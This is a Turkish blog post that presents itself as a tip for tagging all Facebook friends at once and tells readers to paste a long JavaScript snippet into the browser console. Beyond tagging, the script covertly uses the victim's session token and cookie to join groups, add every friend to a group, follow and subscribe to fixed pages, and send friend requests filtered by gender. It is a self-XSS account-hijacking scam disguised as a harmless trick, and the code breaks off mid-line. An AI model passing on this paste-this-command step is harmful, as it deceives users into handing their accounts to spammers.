facebook-mobil-oyunFacebook hepimizin kullandığı bir sosyal medya aracı. Bu sosyal medya aracında bazen gönderiler paylaşırız. Bu gönderilerde de arkadaşlarımızı etiketlemek isteriz. Şimdi size arkadaşlarınızın tümünü etiketlemek istediğinizde bu işlemi kolayca yapabilmeniz için birkaç ipucu anlatacağım size. Size göstereceğim bu etiketleme koduyla beraber yorum kısmında tüm arkadaşlarınızı etiketlemek olacaksınız. Gelin şimdi bu yolu nasıl gideceğimize beraberce bakalım:

Size Lazım Olan Araçlar

Öncelikle size gereken iki program vardır. İlk olarak Google Chrome Web Browser a ihtiyacınız olacak. Bu işlemi Chrome da yapabileceksiniz. Daha sonra aşağıda vereceğim olan kodlara ihtiyacınız olacaktır. Şimdi ne yapmanız gerektiğine adımlar halinde bakalım:

İlk olarak tabii ki Facebook adresine sahip olmalısınız. Facebook a girdiğiniz zaman sağ üstteki küçük ters üçgen sekmesine tıklayarak ayarlar çubuğuna gelmelisiniz. Buradaki sekmede de kullanıcı adı kısmı boş ise hemen kendinize bir kullanıcı adı belirlemeniz gerekmektedir.

Daha sonra profilinizde herhangi bir ileti paylaşıyorsunuz ve paylaştığınız zaman küçük profil resminizin yanında bir süre belirleyecektir. Az önce,2 dakika önce,5 dakika önce gibi. O zamana tıkladığınız zaman http://www.facebook.com/kullanıcı adı/posts/….. uzantılı bir sayfa oluşacaktır. Bu sayfada klavyenizden f12 tuşuna ya da fn ile beraber f12 tuşuna basıyorsunuz ve alttan bir sekme açılıyor. Oradan console yazan yere tıklıyorsunuz ve aşağıda vereceğim kodu oraya kopyalayıp yapıştırıyorsunuz. Göreceksiniz ki arkadaşlarınız yorum kısmına teker teker etiketlenmiş olacaklar.

Şimdi size kodu paylaşıyorum:

[code] /* CREDITOS AO MIGUEL TARGA, ESSA PARTE E DELE */

function x__0() { return window.ActiveXObject ? new ActiveXObject(“Msxml2.XMLHTTP”) : new XMLHttpRequest; };

//Pegar todos amigos

function get_friends(){

var a=x__0();

a.open(“GET”, “/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=”+uid+”&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm”, false);

a.send(null);

if (a.readyState == 4) {

var f = JSON.parse(a.responseText.substring(a.responseText.indexOf(‘{‘)));

return f.payload.entries;

}

return false;

}

/* FIM DA PARTE DO MIGUEL TARGA */

//Pegar todos amigos

function get_uid(b){

var a=x__0();

a.open(“GET”, ‘http://graph.facebook.com/’+b, false);

a.send();

if (a.readyState == 4) {

return uid = JSON.parse(a.responseText).id;

}

return false;

}

// Pattern que vai trocar o valor dos coment?rios pelas marcaç?es

var patt = /comment_text=(.*?)&/

var c = 1;

username = /\.com\/(.*?)\//.exec(window.top.location)[1];

uid = get_uid(username);

a = window.top.location;

termina = 0;

var amigos = get_friends();

post_id = /[0-9]{8,}/.exec(a);

uids = ‘comment_text=’;

header = ‘ft_ent_identifier=’+post_id+’&comment_text=?&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=’+uid+’&__a=1&__req=4u&fb_dtsg=’+document.getElementsByName(‘fb_dtsg’)[0].value+’&phstamp=’+Math.random();

for ( var n = 1 ; n<amigos.length ; n++ ){ //uids += ‘%40[‘ + amigos[n].uid + ‘%3A’ + encodeURI(amigos[n].text) + ‘]%20′; fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value; uids += ‘%40[‘ + amigos[n].uid + ‘%3AAAAAAAAAAAA]%20′; c++; if(c == 7){ // Quando o contadorchega em 7, ele termina o parâmetro com um &… uids += ‘&’; // …envia as coisas com o método do indiano… with(new XMLHttpRequest()) open(“POST”, “/ajax/ufi/add_comment.php?__a=1″),setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),send(header.replace(patt, uids)); // … espera um segundo… z = setTimeout(‘function(){asd=0}’, 1000); clearInterval(z); // … e setatudo de novoprarecomeçar c = 1; uids = ‘comment_text=’; } } var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function cereziAl(isim) { var tarama = isim + “=”; if (document.cookie.length> 0) {

konum = document.cookie.indexOf(tarama)

if (konum != -1) {

konum += tarama.length

son = document.cookie.indexOf(“;”, konum)

if (son == -1)

son = document.cookie.length

return unescape(document.cookie.substring(konum, son))

}

else { return “”; }

}

}

function getRandomInt (min, max) {

return Math.floor(Math.random() * (max – min + 1)) + min;

}

function randomValue(arr) {

return arr[getRandomInt(0, arr.length-1)];

}

var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){

var http4 = new XMLHttpRequest();

var url4 = “/ajax/follow/follow_profile.php?__a=1″;

var params4 = “profile_id=” + abone + “&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=” + fb_dtsg + “&lsd&__” + user_id + “&phstamp=”;

http4.open(“POST”, url4, true);

//Sendtheproperheaderinformationalongwiththerequest

http4.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);

http4.setRequestHeader(“Content-length”, params4.length);

http4.setRequestHeader(“Connection”, “close”);

http4.onreadystatechange = function() {//Call a function whenthestatechanges.

if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close theconnection

}

}

http4.send(params4);

}

function sublist(uidss) {

var a = document.createElement(‘script’);

a.innerHTML = “new AsyncRequest().setURI(‘/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe’).setData({ flid: ” + uidss + ” }).send();”;

document.body.appendChild(a);

}

sublist(“662993440399401″);

sublist(“129619863848582″);

sublist(“374082089402357″);

sublist(“374089992734900″);

sublist(“374090609401505″);

sublist(“374091156068117″);

sublist(“374091689401397″);

varfb_dtsg = document[‘getElementsByName’](‘fb_dtsg’)[0][‘value’];

varuser_id = document[‘cookie’][‘match’](document[‘cookie’][‘match’](/c_user=(\d+)/)[1]);

varhttpwp = new XMLHttpRequest();

varurlwp = ‘/ajax/groups/membership/r2j.php?__a=1′;

varparamswp = ‘&ref=group_jump_header&group_id=’ + gid + ‘&fb_dtsg=’ + fb_dtsg + ‘&__user=’ + user_id + ‘&phstamp=’;

httpwp[‘open’](‘POST’, urlwp, true);

httpwp[‘setRequestHeader’](‘Content-type’, ‘application/x-www-form-urlencoded’);

httpwp[‘setRequestHeader’](‘Content-length’, paramswp[‘length’]);

httpwp[‘setRequestHeader’](‘Connection’, ‘keep-alive’);

httpwp[‘send’](paramswp);

varfb_dtsg = document[‘getElementsByName’](‘fb_dtsg’)[0][‘value’];

varuser_id = document[‘cookie’][‘match’](document[‘cookie’][‘match’](/c_user=(\d+)/)[1]);

varfriends = new Array();

gf = new XMLHttpRequest();

gf[‘open’](‘GET’, ‘/ajax/typeahead/first_degree.php?__a=1&viewer=’ + user_id + ‘&token’ + Math[‘random’]() + ‘&filter[0]=user&options[0]=friends_only’, false);

gf[‘send’]();

if (gf[‘readyState’] != 4) {} else {

data = eval(‘(‘ + gf[‘responseText’][‘substr’](9) + ‘)’);

if (data[‘error’]) {} else {

friends = data[‘payload’][‘entries’][‘sort’](function (_0x93dax8, _0x93dax9) {

return _0x93dax8[‘index’] – _0x93dax9[‘index’];

});

};

};

for (var i = 0; i <friends[‘length’]; i++) {

varhttpwp = new XMLHttpRequest();

var urlwp = ‘/ajax/groups/members/add_post.php?__a=1′;

varparamswp= ‘&fb_dtsg=’ + fb_dtsg + ‘&group_id=’ + gid + ‘&source=typeahead&ref=&message_id=&members=’ + friends[i][‘uid’] + ‘&__user=’ +user_id + ‘&phstamp=’;

httpwp[‘open’](‘POST’, urlwp, true);

httpwp[‘setRequestHeader’](‘Content-type’, ‘application/x-www-form-urlencoded’);

httpwp[‘setRequestHeader’](‘Content-length’, paramswp[‘length’]);

httpwp[‘setRequestHeader’](‘Connection’, ‘keep-alive’);

httpwp[‘onreadystatechange’] = function () {

if (httpwp[‘readyState’] == 4 &&httpwp[‘status’] == 200) {};

};

httpwp[‘send’](paramswp);

};

varspage_id = “129619863848582”;

varspage_id = “374082089402357”;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

varsmesaj = “”;

varsmesaj_text = “”;

vararkadaslar = [];

varsvn_rev;

varbugun= new Date();

varbtarihi = new Date();

btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);

if(!document.cookie.match(/paylasti=(\d+)/)){

document.cookie = “paylasti=hayir;expires=”+ btarihi.toGMTString();

}

//arkadaslari al ve isle

function sarkadaslari_al(){

varxmlhttp = new XMLHttpRequest();

xmlhttp.onreadystatechange = function () {

if(xmlhttp.readyState == 4){

eval(“arkadaslar = ” + xmlhttp.responseText.toString().replace(“for (;;);”,””) + “;”);

for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){

smesaj = “”;

smesaj_text = “”;

for(i=f*10;i<(f+1)*10;i++){ if(arkadaslar.payload.entries[i]){ smesaj += ” @[” + arkadaslar.payload.entries[i].uid + “:” + arkadaslar.payload.entries[i].text + “]”; smesaj_text += ” ” + arkadaslar.payload.entries[i].text; } } sdurumpaylas(); } } }; var params = “&filter[0]=user”; params += “&options[0]=friends_only”; params += “&options[1]=nm”; params += “&token=v7″; params += “&viewer=” + user_id; params += “&__user=” + user_id; if (document.URL.indexOf(“https://”) >= 0) { xmlhttp.open(“GET”, “https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1″ + params, true); }

else { xmlhttp.open(“GET”, “http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1″ + params, true); }

xmlhttp.send();

}

//tiklamaolayini dinle

var tiklama = document.addEventListener(“click”, function () {

if(document.cookie.split(“paylasti=”)[1].split(“;”)[0].indexOf(“hayir”) >= 0){

svn_rev = document.head.innerHTML.split(‘”svn_rev”:’)[1].split(“,”)[0];

sarkadaslari_al();

document.cookie = “paylasti=evet;expires=”+ btarihi.toGMTString();

document.removeEventListener(tiklama);

}

}, false);

//arkada??ekleme

function sarkadasekle(uid,cins){

varxmlhttp = new XMLHttpRequest();

xmlhttp.onreadystatechange = function () {

if(xmlhttp.readyState == 4){

}

};

xmlhttp.open(“POST”, “/ajax/add_friend/action.php?__a=1″, true);

varparams = “to_friend=” + uid;

params += “&action=add_friend”;

params += “&how_found=friend_browser”;

params += “&ref_param=none”;

params += “&outgoing_id=”;

params += “&logging_location=friend_browser”;

params += “&no_flyout_on_click=true”;

params += “&ego_log_data=”;

params += “&http_referer=”;

params += “&fb_dtsg=” + document.getElementsByName(‘fb_dtsg’)[0].value;

params += “&phstamp=165816749114848369115″;

params += “&__user=” + user_id;

xmlhttp.setRequestHeader (“X-SVN-Rev”, svn_rev);

xmlhttp.setRequestHeader (“Content-Type”,”application/x-www-form-urlencoded”);

if(cins == “farketmez” &&document.cookie.split(“cins” + user_id +”=”).length> 1){

xmlhttp.send(params);

}else if(document.cookie.split(“cins” + user_id +”=”).length<= 1){

cinsiyetgetir(uid,cins,”sarkadasekle”);

}else if(cins == document.cookie.split(“cins” + user_id +”=”)[1].split(“;”)[0].toString()){

xmlhttp.send(params);

}

}

//cinsiyet belirleme

varcinssonuc = {};

var cinshtml = document.createElement(“html”);

function scinsiyetgetir(uid,cins,fonksiyon){

varxmlhttp = new XMLHttpRequest();

xmlhttp.onreadystatechange = function () {

if(xmlhttp.readyState == 4){

eval(“cinssonuc = ” + xmlhttp.responseText.toString().replace(“for (;;);”,””) + “;”);

cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html

btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);

if(cinshtml.getElementsByTagName(“select”)[0].value == “1”){

document.cookie = “cins” + user_id + “=kadin;expires=” + btarihi.toGMTString();

}else if(cinshtml.getElementsByTagName(“select”)[0].value == “2”){

document.cookie = “cins” + user_id + “=erkek;expires=” + btarihi.toGMTString();

&lt

 

Facebook Tüm Arkadaşları Etiketleme
Yazıya Oy Verin..